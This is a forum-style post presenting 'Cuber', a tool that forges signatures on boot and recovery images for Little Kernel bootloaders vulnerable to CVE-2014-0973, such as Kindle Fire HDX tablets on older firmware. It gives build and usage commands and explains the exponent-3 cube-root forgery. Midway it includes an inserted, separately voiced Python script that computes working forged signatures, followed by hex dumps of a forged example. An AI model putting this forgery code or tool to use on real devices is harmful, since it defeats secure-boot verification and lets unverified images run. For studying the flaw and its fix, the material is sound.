I am proud to present my image signing tool, called Cuber.
The name is short for Cube Root finder, which is essentially what the tool does: it finds an integer cube root that serves as a forged signature.
About
This is a tool that checks and signs recovery/boot images for Little Kernel bootloaders that lack the patch for CVE-2014-0973.
Who is vulnerable?
Kindle Fire HDX tablets with firmware older than 3.2.4. It does NOT work on 3.2.4.
Probably many other devices using Little Kernel bootloaders built before 13 June 2014 (no guarantees).
Requirements on an Ubuntu system:
Code:
gcc
libmpc-dev
libmpfr-dev
libgmp3-dev
libssl-dev
python
python-pip
The following Python package is also required:
Code:
gmpy2
Install it using pip:
Code:
sudo pip install gmpy2
Installation
Download the source code from https://github.com/Verteo/Cuber into a folder of your choice, change into that folder and run make.
Usage
Checks whether the image would pass the signature verification:
Code:
Cuber -check path/to/image.img
Creates a signature for the given image and writes a new signed image to the specified location:
Code:
Cuber -sign path/to/input/image.img path/to/output/image.img
The files prodcert.pem and signature.py must be present for the application to work.
Why Python?
Handling bignums is easier in Python than in C++.
The exploit
https://www.codeaurora.org/projects/...-cve-2014-0973
The bootloader does not properly check how many bytes come out of the signature when it is decrypted (raised to the public exponent). Only the leading bytes are compared with the image hash, so we can append garbage bytes after the hash and forge a signature.
A PKCS#1 v1.5 padded signature starts with 00 01 PS 00.
PS is the padding string and consists of at least 8 FF bytes.
After this header comes the 32-byte SHA-256 hash of the image.
So the decrypted signature (the signature cubed, since the public exponent is 3) should look like this:
Code:
00 01 FF FF FF FF FF FF FF FF 00 xx xx xx xx xx
xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx
xx xx xx xx xx xx xx xx xx xx xx .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
The garbage bytes can have arbitrary values. We use that freedom to make the whole 256-byte block a perfect cube: because the public exponent is 3 and a block that starts with 00 01 is smaller than the 2048-bit modulus, the cube is never reduced modulo the key, so its integer cube root is a signature that the unpatched check accepts. Cuber computes that cube root.
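The forgery and the affected check, as an added example in Python (this is not Cuber's own code or its author's). It assumes a 2048-bit modulus with public exponent 3, as the 256-byte dumps below imply. The modulus value is a constructed placeholder, since prodcert.pem is not on this page; the forgery itself never uses it, only its length. The two verifier functions are a model of the unpatched and patched length check rather than Little Kernel's code, and the patched variant assumes the fix requires the recovered data to be exactly one digest long. The signature bytes it produces need not match the post's dump byte for byte, because any cube root with the right leading bytes works.

```python
"""Forge an e=3 RSA signature that an unpatched Little Kernel check accepts.

Added example, not the Cuber source. No private key is needed: with public
exponent 3 and a 2048-bit modulus, any integer s whose cube (as a 256-byte
big-endian block) starts with 00 01 FF*8 00 || SHA-256(image) is accepted by
a verifier that ignores how many bytes follow the digest.
"""
import hashlib

MOD_LEN = 256   # 2048-bit modulus, as in the post's 256-byte hex dumps
HASH_LEN = 32   # SHA-256
PAD = b"\x00\x01" + b"\xff" * 8 + b"\x00"   # minimal PKCS#1 v1.5 type-1 header

# Constructed placeholder modulus: the real prodcert.pem key is not on the
# page. Any 2048-bit odd number works for the demo because the forged cube is
# below 2**2034 and is therefore never reduced modulo N.
MODULUS = (int.from_bytes(hashlib.sha256(b"constructed modulus").digest() * 8, "big")
           | (1 << 2047) | 1)
PUBLIC_EXPONENT = 3


def icbrt_ceil(n):
    """Smallest integer s with s**3 >= n, by exact integer Newton iteration."""
    if n <= 0:
        return 0
    s = 1 << ((n.bit_length() + 2) // 3)        # overestimate: s**3 > n
    while True:
        t = (2 * s + n // (s * s)) // 3
        if t >= s:
            break                               # s is now floor(cbrt(n))
        s = t
    return s if s ** 3 >= n else s + 1


def forge_from_digest(digest):
    """Return a MOD_LEN-byte signature whose cube starts with PAD || digest."""
    prefix = PAD + digest                                    # 43 fixed bytes
    free = MOD_LEN - len(prefix)                             # 213 "garbage" bytes
    target = int.from_bytes(prefix + b"\x00" * free, "big")
    s = icbrt_ceil(target)
    # s**3 - target < 3*s**2 + 3*s + 1, far below 2**(8*free), so the cube
    # keeps the prefix and the garbage lands in the trailing bytes.
    cube = (s ** 3).to_bytes(MOD_LEN, "big")
    assert cube.startswith(prefix)
    return s.to_bytes(MOD_LEN, "big")


def forge_signature(image):
    return forge_from_digest(hashlib.sha256(image).digest())


def pkcs1_type1_unpad(em):
    """OpenSSL RSA_PKCS1_PADDING style check of 00 01 FF..FF 00: returns the
    bytes after the header, however many there are, or None on bad framing."""
    if len(em) != MOD_LEN or em[0] != 0x00 or em[1] != 0x01:
        return None
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        return None
    return em[i + 1:]


def recover(sig, n=MODULUS, e=PUBLIC_EXPONENT):
    """The public RSA operation sig**e mod n, as a MOD_LEN-byte block."""
    return pow(int.from_bytes(sig, "big"), e, n).to_bytes(MOD_LEN, "big")


def verify_vulnerable(image, sig, n=MODULUS):
    """Model of the unpatched check: compare only the first HASH_LEN recovered
    bytes with the digest and ignore how many bytes were recovered."""
    data = pkcs1_type1_unpad(recover(sig, n))
    return data is not None and data[:HASH_LEN] == hashlib.sha256(image).digest()


def verify_fixed(image, sig, n=MODULUS):
    """Model of the patched check (assumption: the recovered data must be
    exactly one digest long, so trailing garbage is rejected)."""
    data = pkcs1_type1_unpad(recover(sig, n))
    return (data is not None and len(data) == HASH_LEN
            and data == hashlib.sha256(image).digest())


if __name__ == "__main__":
    image = b"constructed boot image contents"      # constructed sample input
    sig = forge_signature(image)
    print("signature:", sig.hex())
    print("cubed    :", recover(sig).hex())
    print("unpatched verifier accepts:", verify_vulnerable(image, sig))
    print("patched verifier accepts  :", verify_fixed(image, sig))
```

Running it shows the same shape as the dumps below: a signature with a long run of leading zero bytes, and a cube that begins with the header and the digest and carries the garbage in its tail. Feeding the post's example digest to forge_from_digest gives a signature of the same form.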
Example
Hash of example image:
Code:
A9 07 1C A3 31 43 16 F7 2E 9A FF B3 31 46 A6 EC 60 6E DE 42 45 9E 4C 9B 6B 5F B0 E1 97 1C 33 85
Desired cubed signature:
Code:
00 01 FF FF FF FF FF FF FF FF 00 A9 07 1C A3 31
43 16 F7 2E 9A FF B3 31 46 A6 EC 60 6E DE 42 45
9E 4C 9B 6B 5F B0 E1 97 1C 33 85 .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
Generated signature:
Code:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 32 CB FD 4A 7A
DC 79 05 58 41 75 78 07 60 1D 4F D5 09 9A 22 ED
4A F3 B3 46 62 94 03 A0 78 BF AE E1 FF 07 49 B4
98 C9 C7 F6 96 A1 66 E1 3A D0 8A 97 9D 82 4D 64
08 4E 91 B1 D3 F8 EB 97 81 57 92 97 D3 F2 E5 D5
6F A4 6C DC 91 79 11 A4 9F 23 83 4E A4 84 20 C0
Generated signature cubed:
Code:
00 01 FF FF FF FF FF FF FF FF 00 A9 07 1C A3 31
43 16 F7 2E 9A FF B3 31 46 A6 EC 60 6E DE 42 45
9E 4C 9B 6B 5F B0 E1 97 1C 33 85 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 8D C2 E5 F5 65 19 0A BA 69 BA
14 29 BE 83 F4 2E 61 04 3E 1E 59 79 3C C6 D6 D8
D0 59 D1 46 E4 D4 86 B8 D4 A0 C1 2F 3A 4C 72 F7
F4 14 E7 CF CE 3F 5D A3 53 25 D6 7B 7B 83 AF 66
B8 42 A7 06 79 7C 31 69 51 43 F6 83 B2 29 65 81
F5 B0 9D 93 77 6B BA 83 52 C0 F0 68 93 AF 65 9E
19 F2 EC 9D 9A 76 90 30 15 5F F5 B5 88 EB 89 FE
CB DC 3A 4E D7 71 32 E3 10 FF 39 C0 C0 73 47 71
A2 C4 07 7A 3C E2 F7 96 68 A3 C8 35 40 33 02 A5
AA 4E CB BB AC 56 DB 98 F2 50 76 BD A7 82 6E C3
AC 34 F4 E9 E7 87 99 43 B4 6E 94 67 F6 6C 00 00
As you can see, this is a valid signature: the cube starts with 00 01, eight FF bytes, 00 and the image hash, and the unpatched bootloader compares nothing beyond the hash.
Disclaimer
I'm not an expert in cryptography; my statements may be false or incomplete.